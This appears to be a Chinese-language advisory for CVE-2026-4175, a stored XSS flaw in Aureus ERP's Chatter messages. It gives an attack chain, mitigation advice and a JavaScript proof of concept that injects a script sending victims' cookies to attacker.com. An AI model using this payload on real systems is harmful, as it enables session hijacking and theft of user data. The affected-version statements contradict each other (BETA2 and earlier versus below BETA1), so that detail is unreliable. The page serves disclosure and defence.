CVE-2026-4175: Aureus ERP Chatter Message Handler跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-4175

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Aureus ERP

漏洞概述

CVE-2026-4175是Aureus ERP系统中存在的存储型跨站脚本(XSS)漏洞。该漏洞影响Aureus ERP 1.3.0-BETA2及之前版本，漏洞位于Chatter消息处理组件中的content-text-entry.blade.php文件。由于应用程序未对用户输入的subject/body参数进行充分的输入验证和输出编码，攻击者可以通过在消息内容中注入恶意JavaScript代码。当其他用户查看包含恶意脚本的消息时，该脚本将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或钓鱼攻击等严重后果。该漏洞需要低权限用户身份且需要用户交互才能触发，但可被远程利用。

技术细节

漏洞存在于Aureus ERP的Chatter消息处理模块中，具体文件路径为plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php。攻击者通过向消息的subject或body参数注入恶意JavaScript代码（如<script>alert(document.cookie)</script>），由于该组件在渲染消息内容时未对用户输入进行HTML实体编码或适当的输出过滤，导致恶意脚本被存储在服务器端并在下一次渲染时执行。攻击者可利用此漏洞窃取受害者的认证Cookie、会话令牌或进行其他恶意操作。由于该漏洞为存储型XSS，恶意脚本会持久化在系统中，影响所有查看该消息的用户。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标Aureus ERP版本，确认版本低于1.3.0-BETA1，并定位Chatter消息组件端点

STEP 2

2. 认证获取

攻击者使用低权限账户登录系统，获取有效的访问令牌

STEP 3

3. 恶意载荷注入

攻击者构造包含XSS payload的消息请求，在subject或body字段中注入恶意JavaScript代码

STEP 4

4. 载荷存储

由于应用未进行输入验证，恶意脚本被存储在数据库中

STEP 5

5. 受害者触发

当其他用户（受害者）访问消息列表或查看特定消息时，恶意脚本被从数据库取出并嵌入到页面响应中

STEP 6

6. 脚本执行

受害者的浏览器执行恶意JavaScript代码，攻击者可窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-4175 XSS PoC for Aureus ERP
// Target: Aureus ERP < 1.3.0-BETA1
// Component: Chatter Message Handler

// Step 1: Identify vulnerable endpoint
const targetUrl = "https://target-aureus-erp.com";
const messageEndpoint = "/chatter/messages/store";

// Step 2: Inject malicious XSS payload in message subject/body
const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Step 3: Send crafted request with XSS payload
fetch(targetUrl + messageEndpoint, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <user_token>'
    },
    body: JSON.stringify({
        subject: xssPayload,
        body: xssPayload,
        recipient_id: 'target_user_id'
    })
});

// Step 4: When victim views the message, XSS executes
// Attacker receives victim's cookies via the fetch request

影响范围

Aureus ERP < 1.3.0-BETA1

防御指南

临时缓解措施

立即将Aureus ERP升级至1.3.0-BETA1版本，该版本包含修复commit 2135ee7efff4090e70050b63015ab5e268760ec8，可有效防止XSS攻击。在升级前，可临时禁用Chatter消息功能或限制消息内容的HTML标签白名单，并对所有消息输出进行严格的HTML转义处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4175
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4175
3 Details https://www.cvedetails.com/cve/CVE-2026-4175/
4 VulDB https://vuldb.com/cve/CVE-2026-4175
5 Link https://github.com/aureuserp/aureuserp/commit/2135ee7efff4090e70050b63015ab5e268760ec8
6 Link https://github.com/aureuserp/aureuserp/pull/939
7 Link https://github.com/aureuserp/aureuserp/releases/tag/v1.3.0-BETA1
8 Link https://vuldb.com/?ctiid.351083
9 Link https://vuldb.com/?id.351083
10 Link https://vuldb.com/?submit.769827